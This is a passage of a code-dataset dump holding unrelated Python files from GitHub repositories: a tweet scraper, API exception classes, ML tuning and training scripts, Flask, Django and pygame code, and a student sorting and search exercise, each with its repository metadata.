1; i >= 0; i--) {\n comp = comps[i];\n xpath += '/' + comp.name;\n if (comp.position !== null) {\n xpath += '[' + comp.position + ']';\n }\n }\n return xpath;\n }\n return absoluteXPath(arguments[0]);\n \"\"\", tweet)\n return xpath\n\ndef splitTime(sinceTime,untilTime):\n #split untilTime-sinceTime by month\n dates = []\n for year in range(sinceTime.year, untilTime.year + 1):\n for month in range(1, 13):\n first_day = datetime.datetime(year, month, 1)\n last_day = calendar.monthrange(year, month)[1]\n dates.append(first_day)\n dates.append(datetime.datetime(year, month, last_day))\n s = dates[0::2]\n e = dates[1::2]\n sinceList = [str(date).split()[0] for date in s]\n untilList = [str(date).split()[0] for date in e]\n return sinceList,untilList\n\ndef scrap(browser,advSearchComand):\n key='[data-testid=\"tweetText\"]'#locating the tweets\n wait = WebDriverWait(browser, 10)\n browser.get(advSearchComand)\n WebDriverWait(browser, 10).until(EC.element_to_be_clickable((By.CSS_SELECTOR, key)))\n collect=[]\n tweets = wait.until(EC.presence_of_all_elements_located((By.CSS_SELECTOR, key)))\n while tweets:\n for tweet in tweets:\n if len(getXpath(browser,tweet))>=210:#过滤被转发微博,被转发微博xpath更长\n continue\n collect.append(tweet.text)\n browser.execute_script(\"arguments[0].scrollIntoView({ behavior: 'auto', block: 'start' });\", tweet)#跳转到最后一条贴文\n time.sleep(5)\n tempTweets = wait.until(EC.presence_of_all_elements_located((By.CSS_SELECTOR, key)))\n tweets=tempTweets[tempTweets.index(tweet)+1:]\n return collect","repo_name":"Jing-XING/TweetCrawler","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71846888684","text":"from typing import Dict, List, Any\nfrom requests import HTTPError, Response\nfrom urllib.parse import urlparse, parse_qs\nfrom functools import reduce\n\n\nclass CoinMetricsUnauthorizedException(HTTPError):\n \"\"\"\n Raised when a request is made that will return an error due to being unauthorized to flat files server\n \"\"\"\n\n def __init__(self, response: Response, *args: Any, **kwargs: Any):\n if response.status_code not in [401, 403]:\n response.raise_for_status()\n self.response = response\n self.request = response.request\n error_message = \"\"\"The provided API key is not authorized to access the Coin Metrics Flat Files server. This product is separate from the API. If you'd like access granted or believe this is a mistake please contact Coin Metrics support.\n \"\"\"\n self.msg = error_message\n super().__init__(response=response, request=response.request, *args, **kwargs)\n\n def __str__(self) -> str:\n return self.msg\n\n\nclass CoinMetricsClientQueryParamsException(HTTPError):\n \"\"\"\n Raised when a request is made that will return an error due to the logic or contents of the request\n \"\"\"\n\n def __init__(self, response: Response, *args: Any, **kwargs: Any):\n if response.status_code != 414:\n response.raise_for_status()\n parsed_query_params: Dict[str, List[str]] = parse_qs(\n str(urlparse(url=response.request.url).query)\n )\n get_sum_of_lengths = lambda strings: reduce(lambda a, b: a + len(b), strings, 0)\n param_length_dict = {\"Total characters\": 0}\n for param, values in parsed_query_params.items():\n sum_of_param_lengths = get_sum_of_lengths(values)\n param_length_dict[param] = sum_of_param_lengths\n param_length_dict[\"Total characters\"] += sum_of_param_lengths\n exception_message = (\n \"This request failed because the request URL is too long, consider reducing the length \"\n f\"of the params.\\n 414 errors may get returned as total characters in query params exceed 5000\"\n f\"\\nLength of the params provided for reference:\\n {param_length_dict}\"\n )\n self.msg = exception_message\n super().__init__(*args, **kwargs)\n\n def __str__(self) -> str:\n return self.msg\n","repo_name":"coinmetrics/api-client-python","sub_path":"coinmetrics/_exceptions.py","file_name":"_exceptions.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"19"} +{"seq_id":"70217545644","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Mar 6 10:29:46 2018\r\n\r\n@author: YUBO\r\n\"\"\"\r\nimport pandas as pd\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport scipy as sp\r\nimport sklearn\r\nfrom pandas import Series,DataFrame\r\nfrom sklearn.cross_validation import train_test_split\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.ensemble import ExtraTreesClassifier, RandomForestClassifier,AdaBoostClassifier,GradientBoostingClassifier\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom mlxtend.classifier import StackingCVClassifier\r\nfrom collections import Counter\r\nfrom sklearn.decomposition import PCA\r\nnp.random.seed(0)\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.model_selection import GridSearchCV\r\n#读取测试集\r\ntest_data=pd.read_csv(\"all_test.csv\",header=None)\r\ntest_data=test_data.iloc[0:99998,:]\r\nerror=pd.read_csv(\"error.csv\",header=None)\r\ntest_data=test_data.append(error,ignore_index=True)\r\ntest_data1=test_data.iloc[:,1:]\r\ntest_data1.columns=list(np.arange(2600))\r\n\r\n\r\ndata_train=pd.read_csv(\"partTrainData.csv\",header=None)\r\nmix_data=data_train.iloc[:,0:2600].append(test_data1,ignore_index=True)\r\nmix_data=DataFrame(mix_data)\r\nscale = StandardScaler()\r\nx = scale.fit_transform(mix_data)#数据标准化\r\nx=DataFrame(x)\r\npca = PCA(n_components=50)\r\nx_pca_new=pca.fit_transform(x)#在各主成分投影数据,做主成分得分\r\nx_pca_new=DataFrame(x_pca_new)\r\ntest11=x_pca_new.iloc[48383:,:]\r\ntrain11=x_pca_new.iloc[0:48383,:]\r\ntrain11.loc[:,\"class\"]=data_train.iloc[:,2600]\r\ntrain11_train,train11_test=train_test_split(train11,test_size=0.3)\r\n#参数寻优\r\nresults1 = []\r\n\r\n# 决策树个数参数取值\r\nn_estimators_options=list(range(100,400,5))\r\n\r\nmax_depth_options=list(range(39,55,1))\r\nmin_samples_split_options=list(range(2,50,2))\r\nmax_leaf_nodes_options=list(range(1,50,4))\r\nrandomstate_options=list(range(0,50,2))\r\nmin_samples_leaf_options=list(range(1,40,2))\r\n\r\nfor n_estimators_size in n_estimators_options:\r\n for max_depth_size in max_depth_options:\r\n clf = RandomForestClassifier(max_features=19,min_samples_leaf=8,n_estimators=265,max_depth=50 ,n_jobs=-1,criterion=\"gini\",oob_score=True,class_weight=\"balanced\")\r\n clf.fit(train11_train.iloc[:,0:50],train11_train.iloc[:,50])\r\n q1=clf.predict(train11_test.iloc[:,0:50])\r\n#计算F1得分\r\n score_test = sklearn.metrics.f1_score(train11_test.iloc[:,50], q1, pos_label=list(set(train11_test.iloc[:,50])),average = None)\r\n results1.append((max_depth_size ,np.mean(score_test)))\r\n#输出最佳参数组合\r\nprint(max(results1, key=lambda x:x[1]))\r\nresults2=[]\r\nmax_features_options=list(range(37,51,2))\r\nfor max_features_size in max_features_options:\r\n clf = RandomForestClassifier(max_features=29,min_samples_leaf=8,n_estimators=265,max_depth=50 ,n_jobs=-1,criterion=\"gini\",oob_score=True,class_weight=\"balanced\")\r\n clf.fit(train11_train.iloc[:,0:50],train11_train.iloc[:,50])\r\n q1=clf.predict(train11_test.iloc[:,0:50])\r\n#计算F1得分\r\n score_test = sklearn.metrics.f1_score(train11_test.iloc[:,50], q1, pos_label=list(set(train11_test.iloc[:,50])),average = None)\r\n results2.append((max_features_size ,np.mean(score_test)))\r\n\r\nresults3=[]\r\nmin_samples_leaf_options=list(range(2,30,2))\r\nfor min_samples_leafs in min_samples_leaf_options:\r\n clf = RandomForestClassifier(min_samples_leaf=4,max_features=29,n_estimators=265,max_depth=50 ,n_jobs=-1,criterion=\"gini\",oob_score=True,class_weight=\"balanced\")\r\n clf.fit(train11_train.iloc[:,0:50],train11_train.iloc[:,50])\r\n q1=clf.predict(train11_test.iloc[:,0:50])\r\n#计算F1得分\r\n score_test = sklearn.metrics.f1_score(train11_test.iloc[:,50], q1, pos_label=list(set(train11_test.iloc[:,50])),average = None)\r\n results3.append((min_samples_leafs ,np.mean(score_test)))\r\n \r\nresults1=[]\r\nmin_samples_split_options=list(range(2,100,2))\r\nfor min_samples_splits in min_samples_split_options:\r\n clf = RandomForestClassifier(min_samples_leaf=4,min_samples_split=min_samples_splits,max_features=29,\r\n n_estimators=265,max_depth=50 ,n_jobs=-1,\r\n criterion=\"gini\",oob_score=True,class_weight=\"balanced\",random_state=4,bootstrap=True)\r\n clf.fit(train11_train.iloc[:,0:50],train11_train.iloc[:,50])\r\n q1=clf.predict(train11_test.iloc[:,0:50])\r\n#计算F1得分\r\n score_test = sklearn.metrics.f1_score(train11_test.iloc[:,50], q1, pos_label=list(set(train11_test.iloc[:,50])),average = None)\r\n results1.append((min_samples_splits ,np.mean(score_test)))\r\n#输出最佳参数组合\r\nprint(max(results1, key=lambda x:x[1]))\r\n\r\n ","repo_name":"Gang1997/Astronomy-mining-contest","sub_path":"tune.py","file_name":"tune.py","file_ext":"py","file_size_in_byte":4663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41734731749","text":"import random\nimport numpy as np\nfrom helper import getCostOfRoute\n\ndef initialize_bat_population(graph, population_size):\n bats = []\n for _ in range(population_size):\n bat = list(range(len(graph)))\n random.shuffle(bat)\n bats.append(bat)\n return bats\n\ndef update_velocity(bats, velocities, best_bat, graph, alpha):\n for i in range(len(bats)):\n velocities[i] = (np.array(velocities[i]) + alpha * (np.array(best_bat) - np.array(bats[i]))).tolist()\n\ndef update_position(bats, velocities):\n for i in range(len(bats)):\n for j in range(len(bats[i])):\n r = random.random()\n if r < abs(velocities[i][j]):\n swap_idx = int((j + abs(velocities[i][j])) % len(bats[i]))\n bats[i][j], bats[i][swap_idx] = bats[i][swap_idx], bats[i][j]\n\ndef local_search(bat, graph):\n i, j = random.sample(range(len(bat)), 2)\n new_bat = bat.copy()\n new_bat[i], new_bat[j] = new_bat[j], new_bat[i]\n if getCostOfRoute(new_bat, graph) < getCostOfRoute(bat, graph):\n return new_bat\n return bat\n\ndef bat_algorithm(graph, population_size, max_iter, alpha):\n bats = initialize_bat_population(graph, population_size)\n velocities = [[0 for _ in range(len(graph))] for _ in range(population_size)]\n best_bat = min(bats, key=lambda x: getCostOfRoute(x, graph))\n\n # Initialize the cost history\n cost_history = []\n\n for _ in range(max_iter):\n update_velocity(bats, velocities, best_bat, graph, alpha)\n update_position(bats, velocities)\n\n for i in range(len(bats)):\n bats[i] = local_search(bats[i], graph)\n\n current_best_bat = min(bats, key=lambda x: getCostOfRoute(x, graph))\n current_best_cost = getCostOfRoute(current_best_bat, graph)\n cost_history.append(current_best_cost)\n\n if current_best_cost < getCostOfRoute(best_bat, graph):\n best_bat = current_best_bat\n\n return best_bat, cost_history","repo_name":"Blaze10/AI","sub_path":"Nature-Inspired Algorithms A Comparative Study/bat_algorithm.py","file_name":"bat_algorithm.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31972592462","text":"import core.forms\nimport core.models\nfrom core.views.crud_view_methods import (\n create_methods,\n delete_methods,\n detail_methods,\n list_methods,\n update_methods,\n)\nfrom core.views.crud_view_methods.model_view_generic import (\n GenericDeleteView,\n GenericModelEdit,\n GenericModelList,\n GenericModelView,\n)\nfrom core.views.user_views import SelectLabMixin\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.urls import reverse_lazy\nfrom django.views.generic.detail import DetailView\nfrom django.views.generic.edit import CreateView, DeleteView, FormView, UpdateView\n\n\nclass LoginRequired(LoginRequiredMixin):\n login_url = \"/\"\n redirect_field_name = \"redirect_to\"\n\n\ndef create_list_view(model_name, methods):\n globals()[model_name + \"List\"] = type(\n model_name + \"List\",\n tuple([LoginRequired, SelectLabMixin, GenericModelList]),\n methods,\n )\n\n\ndef create_create_view(model_name, methods):\n globals()[model_name + \"Create\"] = type(\n model_name + \"Create\",\n tuple([LoginRequired, SelectLabMixin, GenericModelEdit, CreateView]),\n methods,\n )\n\n\ndef create_update_view(model_name, methods):\n globals()[model_name + \"Update\"] = type(\n model_name + \"Update\",\n tuple([LoginRequired, SelectLabMixin, GenericModelEdit, UpdateView]),\n methods,\n )\n\n\ndef create_delete_view(model_name, methods):\n globals()[model_name + \"Delete\"] = type(\n model_name + \"Delete\",\n tuple([LoginRequired, SelectLabMixin, GenericDeleteView]),\n methods,\n )\n\n\ndef create_detail_view(model_name, methods):\n globals()[model_name + \"View\"] = type(\n model_name + \"View\",\n tuple([LoginRequired, SelectLabMixin, GenericModelView]),\n methods,\n )\n\n\nfor model_name, methods_list in list_methods.methods.items():\n create_list_view(model_name, methods_list)\n\nfor model_name, methods_list in create_methods.methods.items():\n create_create_view(model_name, methods_list)\n\nfor model_name, methods_list in detail_methods.methods.items():\n create_detail_view(model_name, methods_list)\n\nfor model_name, methods_list in delete_methods.methods.items():\n create_delete_view(model_name, methods_list)\n\nfor model_name, methods_list in update_methods.methods.items():\n create_update_view(model_name, methods_list)\n","repo_name":"darkreactions/ESCALATE","sub_path":"escalate/core/views/crud_views.py","file_name":"crud_views.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"19"} +{"seq_id":"32572954732","text":"#!/usr/bin/env python\n#\n# -*- mode:python; sh-basic-offset:4; indent-tabs-mode:nil; coding:utf-8 -*-\n# vim:set tabstop=4 softtabstop=4 expandtab shiftwidth=4 fileencoding=utf-8:\n#\n\nimport sys\nimport suites\nimport unittest\n\n\ndef test_suites():\n allsuites = []\n for s in (\n suites.coding_style,\n suites.shell_docs,\n ):\n allsuites.append(s.test_cases())\n alltests = unittest.TestSuite(allsuites)\n return alltests\n\n\ndef main():\n runner = unittest.TextTestRunner(verbosity=2)\n result = runner.run(test_suites())\n return (len(result.errors) + len(result.failures)) > 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"clusto/clusto-apiserver","sub_path":"tests/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"71279592682","text":"import megabus_request\r\nimport megabus_record\r\nimport megabus_analyze\r\nimport megabus_display\r\nimport megabus_date\r\n\r\n#working database of prices.\r\nweek_days = {\r\n # outbound prices\r\n 'outbound': {\r\n 'monday':[25,23,25],\r\n 'tuesday':[] ,\r\n 'wednesday':[],\r\n 'thursday':[],\r\n 'friday': [],\r\n 'saturday':[],\r\n 'sunday':[],\r\n },\r\n 'inbound':{\r\n 'imonday' : [],\r\n 'ituesday' : [],\r\n 'iwednesday' :[],\r\n 'ithursday' : [],\r\n 'ifriday' : [],\r\n 'isaturday' : [],\r\n 'isunday' :[],}\r\n }\r\n\r\n\r\nmegabus_display.run_mainSpider()\r\n#origin = input('From: ')\r\n#destination = input('Destination: ')\r\ncrawling = megabus_date.Date()\r\ncrawling_date, crawling_day = crawling.format_date(), crawling.day_of_the_week()\r\nurl = megabus_request.format('New York, ny', 'Boston, MA', crawling_date)\r\n\r\n\r\n# Displays a summary of the trip that is being searched\r\n#2megabus.params_message(html)\r\n\r\ndaysSpan = 90\r\n\r\n\r\n# collect data\r\nfor number in range(0,daysSpan):\r\n print(crawling)\r\n if crawling_date == -1:\r\n crawling.increment_month()\r\n daysSpan = daysSpan + 1\r\n continue\r\n outbound = megabus_record.record_trips(url, 'outbound', crawling_day, week_days)\r\n inbound = megabus_record.record_trips(url,'inbound', crawling_day, week_days)\r\n crawling.increment_day()\r\n crawling_day = c\r\n rawling.day_of_the_week()\r\n\r\n# Resets dates to compare data\r\ncrawling = megabus_date.Date()\r\ncrawling_day = crawling.day_of_the_week()\r\ndaysSpan = 90\r\n\r\nfor number in range(0,daysSpan):\r\n if crawling_date == None:\r\n crawling.increment_month()\r\n daysSpan = daysSpan + 1\r\n continue\r\n outbound = megabus_analyze.compare_trip_prices(url, 'outbound', crawling_day, week_days)\r\n inbound = megabus_analyze.compare_trip_prices(url,'inbound', crawling_day, week_days)\r\n crawling.increment_day()\r\n crawling_day = crawling.day_of_the_week()\r\n\r\n\r\n\r\nprint(week_days)\r\n\r\n\r\n# Display\r\n# Request information\r\n# Records information\r\n# Rads information\r\n# Analyze information","repo_name":"GregBorrelly/MegabusWebCrawler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"38011734000","text":"from flask import Flask, Blueprint, request\nfrom flask_restful import Resource, Api, reqparse\nfrom flask_restful import fields, marshal_with, inputs\n\nfrom app.calculator import FreelanceEntry\n\nfrom .. models import db\n\napi_mod = Blueprint('api', __name__, url_prefix = '/api')\napi = Api(api_mod) # instead of Api(app)\n\ncalculation_row = {\n\t'type' : fields.String,\n\t'hours' :fields.String,\n\t'pay'\t:fields.String,\n\t'rate'\t:fields.String,\n}\n\ncalculation_results = {\n\t'rows' : fields.List(fields.Nested(calculation_row)),\n\t'total_hours' : fields.String,\n\t'total_pay' : fields.String,\n}\n\nparser = reqparse.RequestParser()\n\n# HourlyRate\nparser.add_argument('hours_worked', type=inputs.regex('^[0-9]+$'))\nparser.add_argument('hourly_rate', type=inputs.regex('^[0-9]+$'))\n\n# GuaranteedHours\nparser.add_argument('guaranteed_rate', type=inputs.regex('^[0-9]+$'))\nparser.add_argument('guaranteed_hours', type=inputs.regex('^[0-9]+$'))\nparser.add_argument('actual_hours_worked', type=inputs.regex('^[0-9]+$'))\n\n# for cache = false in ajax get request object (get's around IE's caching)\nparser.add_argument('_', type=str)\n\n\n# Calling parse_args with strict=True ensures that an error is thrown if\n# the request includes arguments your parser does not define.\n# args = parser.parse_args(strict=True)\n\n\nclass Calculation(Resource):\n\t@marshal_with(calculation_results)\n\tdef get(self, calculation_type):\n\t\targs = parser.parse_args(strict = True)\n\t\tif calculation_type == 'hourly_rate':\n\t\t\tentry = FreelanceEntry(\n\t\t\t\thourly_rate = args['hourly_rate'],\n hours = args['hours_worked'],\n ) \n\t\telif calculation_type == 'guaranteed_hours':\n\t\t\tentry = FreelanceEntry(\n\t\t\t\tguaranteed_rate = args['guaranteed_rate'],\n guaranteed_hours = args['guaranteed_hours'],\n hours_worked = args['actual_hours_worked'],\n \t)\n\t\tcalculation = {\n\t\t\t'rows': [],\n\t\t\t'total_hours' : entry.total['hours'],\n\t\t\t'total_pay' : entry.total['pay'],\n\t\t\t}\n\t\tfor time_type in ['regular','overtime','doubletime']:\n\t\t\tcalculation['rows'].append({\n\t\t\t\t'type'\t: time_type,\n\t\t\t\t'hours'\t: getattr(entry,time_type)['hours'],\n\t\t\t\t'pay'\t: getattr(entry,time_type)['pay'],\n\t\t\t\t'rate'\t: getattr(entry,time_type)['rate'],}\n\t\t\t\t)\n\t\t\tprint(calculation['rows'])\n\t\treturn calculation, 201\n\n# Setup the API resource routing here\napi.add_resource(Calculation, '/calc/')\n","repo_name":"Davidthecoolsmartguy/EasyFreelancer","sub_path":"app/mod_api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"13775385370","text":"from turtle import Turtle\n\nFONT = (\"Courier\", 24, \"normal\")\n\n\n# displays the current level in the upper left of the screen f\"Level: {level_number}\"\n# and GAME OVER when the gams has ended.\n\nclass Scoreboard(Turtle):\n def __init__(self):\n super().__init__()\n self.color(\"black\")\n self.penup()\n self.hideturtle()\n self.level_number = 0\n self.update_level()\n\n def update_level(self):\n self.clear()\n self.level_number += 1\n self.goto(-230, 260)\n self.write(f\"Level: {self.level_number}\", align=\"center\", font=FONT)\n\n def game_over(self):\n self.goto(0,0)\n self.write(\"GAME OVER\", align=\"center\", font=FONT)\n","repo_name":"waterseeker/100DaysOfCodePython","sub_path":"Day23/scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36171924726","text":"import os\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\n\n\ndb = SQLAlchemy()\n\n\ndef create_app():\n\n app = Flask(__name__)\n\n app.config['SECRET_KEY'] = os.getenv(\"SECRET_KEY\")\n app.config['SQLALCHEMY_DATABASE_URI'] = os.getenv(\"SQLALCHEMY_DATABASE_URI\")\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n db.init_app(app)\n\n login_manager = LoginManager()\n login_manager.login_view = \"auth.login\"\n login_manager.login_message_category = \"danger\"\n login_manager.init_app(app)\n\n from .models import User, Books\n\n @login_manager.user_loader\n def load_user(user_id):\n return User.query.get(int(user_id))\n\n from .main import main as main_blueprint\n app.register_blueprint(main_blueprint)\n\n from .auth import auth as auth_blueprint\n app.register_blueprint(auth_blueprint)\n\n from .book import book as book_blueprint\n app.register_blueprint(book_blueprint)\n\n from .api import api as api_blueprint\n app.register_blueprint(api_blueprint)\n\n with app.app_context():\n db.create_all()\n return app\n","repo_name":"gomezlucas/BookEdx","sub_path":"application/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73436114604","text":"import pygame, sys, os\nfrom pygame.locals import *\n\n# Content Manager\nclass Content:\n # Builds a Content Manager to a relative path\n def __init__(self, path):\n self.path = path\n\n # Tries to load an image\n # colorkey: -1, (255,255,255), None\n def load_image(self, name, colorkey=None, scale=1,):\n fullname = os.path.join(self.path, name)\n try:\n image = pygame.image.load(fullname)\n except pygame.error(message):\n print(\"Cannot load image:\", name)\n raise SystemExit(message)\n # Apply color key\n image = image.convert()\n if colorkey is not None:\n if colorkey is -1:\n colorkey = image.get_at((0,0))\n image.set_colorkey(colorkey, RLEACCEL)\n \n # Scale image\n if scale == 2:\n image = pygame.transform.scale2x(image)\n elif scale > 2:\n width = image.get_width()* scale\n height = image.get_height() * scale\n image = pygame.transform.smoothscale(image, (width, height)) \n \n return image\n\n # Tries to load a sound\n def load_sound(self, name):\n class NoneSound:\n def play(self): pass\n if not pygame.mixer:\n return NoneSound()\n fullname = os.path.join(self.path, name)\n try:\n sound = pygame.mixer.Sound(fullname)\n except pygame.error(message):\n print(\"Cannot load sound:\", wav)\n raise SystemExit(message)\n return sound\n\n # Loads a set of images\n def load_images(self, array):\n images = []\n for item in array:\n if len(item) == 1:\n images.append(self.load_image(item[0]))\n else:\n images.append(self.load_image(item[0], item[1]))\n return images\n","repo_name":"dacanizares/CafeinaRobot","sub_path":"cafeinagame/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"8207195739","text":"# ДЗ*:\n# 1. Написать функцию binary_search, принимающую в качестве входящего\n# параметра элемент для поиска и список в котором необходимо искать.\n# 2. Алгоритм должен искать с помощью двоичного поиска,\n# изображенного на блок-схеме презентации.\n# 3. Функция в итоге должна распечатать результат. Применить 1 раз эту функцию\n# 4. Написать функцию buble_sort или selection_sort,\n# принимающую в качестве входящего параметра не отсортированный список.\n# 5. Алгоритм функции должен сортировать список методом пузырьковой\n# сортировки или методом сортировки выбором.\n# 6. Функция в итоге должна возвращать отсортированный список.\n# Применить 1 раз данную функцию\n\ndef binary_search(spisok, n): \n spisok = [1,2,3,4,5,6,7,8,9,12,17,85,23,28,33,35,39,40,47,46,56,66,67,90]\n left = -1 \n right = len(spisok) \n while right > left + 1: \n middle = (left + right) // 2 \n if spisok[middle] >= n: \n right = middle \n else: \n left = middle \n return right\n\nprint(binary_search(spisok=[1,2,3,4,5,6,7,8,9,12,17,19,23,28,33,35,39,40,47,46,56,66,67,90] , n=40))\n\n\n\n\n\ndef buble_sort (list):\n\n done = False\n while not done:\n done = True\n for i in range(len(list)-1):\n if list[i] > list[i+1]:\n list[i], list[i+1] = list[i+1], list[i]\n done = False\n print(list)\nprint(buble_sort(list = [33,67,23,59,90,77,35,45]))","repo_name":"Aiba0709/Ubuntu","sub_path":"2-курс/homework7/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1842230644","text":"# import custom modules\nimport sys\nsys.path.insert(0, \"src/util\")\nsys.path.insert(0, \"src/data_util\")\n\n# imports\nimport torch\nimport torchvision\n\nimport copy\nimport torch.optim as optim\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.utils.checkpoint as cp\nfrom torchvision import datasets, models, transforms\nfrom sklearn.metrics import f1_score\nimport os\n\nfrom nbdt.model import SoftNBDT\nfrom nbdt.model import HardNBDT\nfrom nbdt.loss import SoftTreeSupLoss\nfrom nbdt.loss import HardTreeSupLoss\n\nfrom write_to_json import *\n\ndef train_model(model, dataloaders, criterion, optimizer, num_epochs=25):\n '''\n trains model by using train and validation sets\n '''\n # define lists\n best_model_wts = copy.deepcopy(model.state_dict())\n best_fscore = 0.0\n \n loss_train_evo=[]\n acc_train_evo=[]\n fs_train_evo=[]\n \n loss_val_evo=[]\n acc_val_evo=[]\n fs_val_evo=[] \n \n # Detect if we have a GPU available\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n \n print('---> Begin model training...')\n for epoch in range(num_epochs):\n i = 0\n print('Epoch {}/{}'.format(epoch+1, num_epochs))\n\n # determine if in train or validation phase\n for phase in ['train_snakes_r1', 'valid_snakes_r1']:\n if phase == 'train_snakes_r1':\n model.train() # Set model to training mode\n else:\n model.eval() # Set model to evaluate mode\n \n running_loss = 0.0\n running_corrects = 0\n fscore = []\n\n # iterate over data\n for inputs, labels in dataloaders[phase]:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n # zero the parameter gradients before beginning backprop\n optimizer.zero_grad()\n\n # forward\n # track history if only in train\n\n with torch.set_grad_enabled(phase == 'train_snakes_r1'):\n # calculate loss from model outputs\n outputs = model(inputs)\n loss = criterion(outputs, labels)\n _, preds = torch.max(outputs, 1)\n\n # backward + optimize only if in training phase\n if phase == 'train_snakes_r1':\n loss.backward()\n optimizer.step()\n\n # statistics\n labels_cpu = labels.cpu().numpy()\n predictions_cpu = preds.cpu().numpy()\n Fscore = f1_score(labels_cpu, predictions_cpu, average='macro')\n fscore.append(Fscore)\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n\n epoch_loss = running_loss / len(dataloaders[phase].dataset)\n epoch_acc = running_corrects.double() / len(dataloaders[phase].dataset)\n epoch_fscore = np.average(np.array(fscore))\n \n print('{} Loss: {:.4f} Acc: {:.4f} F: {:.3f}'.format(phase, epoch_loss, epoch_acc, epoch_fscore))\n \n if phase == 'train_snakes_r1':\n loss_train_evo.append(epoch_loss)\n epoch_acc = epoch_acc.cpu().numpy()\n acc_train_evo.append(epoch_acc)\n fs_train_evo.append(epoch_fscore) \n else:\n loss_val_evo.append(epoch_loss)\n epoch_acc = epoch_acc.cpu().numpy()\n acc_val_evo.append(epoch_acc)\n fs_val_evo.append(epoch_fscore) \n \n # deep copy the model\n if phase == 'valid_snakes_r1' and epoch_fscore > best_fscore:\n best_acc = epoch_acc\n best_model_wts = copy.deepcopy(model.state_dict())\n\n # load best model weights\n model.load_state_dict(best_model_wts)\n \n print(\"---> Finished model training.\")\n \n return model, loss_train_evo, acc_train_evo, fs_train_evo, loss_val_evo, acc_val_evo, fs_val_evo\n\ndef set_parameter_requires_grad(model, feature_extracting):\n '''\n sets the .requires_grad attribute of the parameters in the model to False when we are feature extracting\n '''\n if feature_extracting:\n for param in model.parameters():\n param.requires_grad = False\n \ndef initialize_model(model_name, num_classes, feature_extract, use_pretrained=True):\n '''\n initializes pretrained vgg model\n '''\n print(\"---> Begin model initialization...\")\n ft_extract = False\n if feature_extract == \"True\":\n ft_extract=True\n\n model_ft = models.densenet121(pretrained=use_pretrained)\n set_parameter_requires_grad(model_ft, ft_extract)\n num_ftrs = model_ft.classifier.in_features\n model_ft.classifier = nn.Linear(num_ftrs, num_classes)\n input_size = 224\n\n print(\"---> Finished model initialization.\")\n \n return model_ft, input_size\n\ndef create_dataloaders(DATA_DIR, batch_size, input_size):\n '''\n return model transformations for training and validation sets\n '''\n print(\"---> Begin dataloader creation...\")\n \n data_transforms = {\n 'train_snakes_r1': transforms.Compose([\n transforms.RandomResizedCrop(input_size),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation([0, 90]),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]),\n 'valid_snakes_r1': transforms.Compose([\n transforms.RandomResizedCrop(input_size),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation([0, 90]),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]),\n } \n \n # Create training and validation datasets\n image_datasets = {\n x: datasets.ImageFolder(os.path.join(DATA_DIR, x), data_transforms[x]) for x in [\n 'train_snakes_r1',\n 'valid_snakes_r1'] \n }\n \n # Create training and validation dataloaders\n dataloaders_dict = {\n x: torch.utils.data.DataLoader(\n image_datasets[x],\n batch_size=batch_size,\n shuffle=True,\n num_workers=4\n ) for x in [\n 'train_snakes_r1',\n 'valid_snakes_r1'\n ]\n }\n print(\"---> Finished creating dataloaders.\")\n \n return dataloaders_dict, len(image_datasets['train_snakes_r1'].classes)\n\ndef params_to_update(model_ft, feature_extract):\n '''\n defines params to update for optimizer, based on feature extract\n '''\n ft_extract = False\n if feature_extract == \"True\":\n ft_extract=True\n \n params_to_update = model_ft.parameters()\n if ft_extract:\n params_to_update = []\n for name,param in model_ft.named_parameters():\n if param.requires_grad == True:\n 